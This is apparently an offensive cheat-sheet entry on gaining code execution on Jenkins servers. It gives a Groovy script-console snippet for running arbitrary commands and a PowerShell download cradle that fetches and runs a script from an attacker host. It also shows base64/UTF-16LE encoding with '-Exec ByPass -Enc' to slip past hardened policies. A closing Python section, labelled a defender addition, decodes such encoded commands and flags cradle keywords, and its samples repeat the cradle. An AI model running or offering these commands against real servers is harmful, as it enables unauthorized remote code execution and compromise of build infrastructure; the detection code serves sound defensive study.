
Jenkins

On a Jenkins server, go to http://<IP>/script (the Groovy script console) and run:

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()   // spawn the command as a child process of the Jenkins controller
proc.consumeProcessOutput(sout, serr)     // capture stdout and stderr into the buffers
proc.waitForOrKill(1000)                  // wait up to 1 s, then kill the process if still running
println "out> $sout err> $serr"

Without admin access: in a job's build configuration, add an "Execute Windows Batch Command" build step and run powershell -c:

powershell -c "iex (new-object system.net.webclient).downloadstring('http://<attacker_IP>/Invoke-HelloWorld.ps1')"

For a more hardened policy, pass the command base64-encoded instead. On Kali, encode it as UTF-16LE and then base64:

echo "iex (new-object system.net.webclient).downloadstring('http://<attacker_IP>/Invoke-HelloWorld.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

In Jenkins, run:

cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <base64_command>
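As an added defender-side example (not part of the original page), the following Python reverses the encoding step above: it pulls the -Enc/-EncodedCommand payload out of a command line, decodes it as base64 then UTF-16LE (the same pipeline as the iconv/base64 one-liner), and flags download-cradle keywords in the result. The log lines are constructed for the example, not real data.

```python
import base64
import re

# The -EncodedCommand switch and its accepted short forms (-e, -ec, -enc), followed by base64.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Substrings typical of an in-memory download cradle (case-insensitive match).
INDICATORS = ("iex", "invoke-expression", "downloadstring", "new-object", "webclient")


def encode_command(script):
    """Encode a script the way the Kali one-liner does: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -Enc payload of a PowerShell command line, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_indicators(script):
    """List the cradle indicators present in a decoded script."""
    low = script.lower()
    return [i for i in INDICATORS if i in low]


def scan(lines):
    """Return (raw line, decoded script, indicators) for each line whose payload looks like a cradle."""
    findings = []
    for line in lines:
        decoded = decode_encoded_command(line)
        if decoded is None:
            continue
        hits = find_indicators(decoded)
        if hits:
            findings.append((line, decoded, hits))
    return findings


# Constructed sample log lines (not real data): one encoded cradle, one plain command, one benign encoded command.
CRADLE = "iex (new-object system.net.webclient).downloadstring('http://<attacker_IP>/Invoke-HelloWorld.ps1')"
SAMPLE_LINES = [
    "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc " + encode_command(CRADLE),
    "PowerShell.exe -NoProfile -Command Get-Service",
    "PowerShell.exe -EncodedCommand " + encode_command("Get-Date"),
]
```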
